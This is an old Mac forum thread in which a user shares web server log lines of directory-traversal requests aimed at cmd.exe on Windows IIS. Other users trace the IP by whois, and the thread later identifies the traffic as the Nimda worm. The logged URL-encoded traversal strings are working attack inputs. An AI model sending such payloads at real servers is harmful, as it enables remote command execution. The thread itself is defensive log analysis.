Go Back   The macosxhints Forums > OS X Help Requests > Networking



Reply
 
Thread Tools Rate Thread Display Modes
Old 03-18-2002, 04:26 PM   #1
illovich
Prospect
 
Join Date: Feb 2002
Location: East Coast
Posts: 22
Is there a way to track IP addys that fail an nslookup?

Hey all,

I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it .

Here's a sample:
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311

I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would ive them access to my C: drive (jokes on them...for a few seperate reasons, as we know).

Anyway, actually 2 questions. One, i would like to report the individual in quesiton to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverselookup failed, so I don't know how to go further in trying to track down the sysadmin.

Secondly, is there a way to deny access to this domain? Is that even worth bothering with?

Thanks,

ill.
__________________
===========================
http://illovich.com
illovich is offline   Reply With Quote
Old 03-18-2002, 09:58 PM   #2
Cadre
Prospect
 
Join Date: Jan 2002
Posts: 36
Lightbulb Geektool's Whois Proxy

The easiest way to get the owner of the IP address is to lookup the netblock owner of the IP. There is a wonderful site: Geektool's Whois Proxy. Just copy/paste the IP into their proxy and hit the whois button and it will spit back the information.

Looks like the IP 155.230.14.11 is owned by Kyungpook National University. The contact email address listed is: staff@bh.knu.ac.kr
Cadre is offline   Reply With Quote
Old 03-19-2002, 08:27 AM   #3
illovich
Prospect
 
Join Date: Feb 2002
Location: East Coast
Posts: 22
Cool, thanks for the tip.

BTW, to anybody who didn't recognize the burst above. A very nice system admin told me that that burst of requests is the nimda virus, out there in netland poking around.

And here I thought it was a scriptkiddy.
__________________
===========================
http://illovich.com
illovich is offline   Reply With Quote
Reply

Thread Tools
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -5. The time now is 02:01 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Site design © Mac Publishing LLC; individuals retain copyright of their postings
but consent to the possible use of their material in other areas of Mac Publishing LLC.
You Rated this Thread: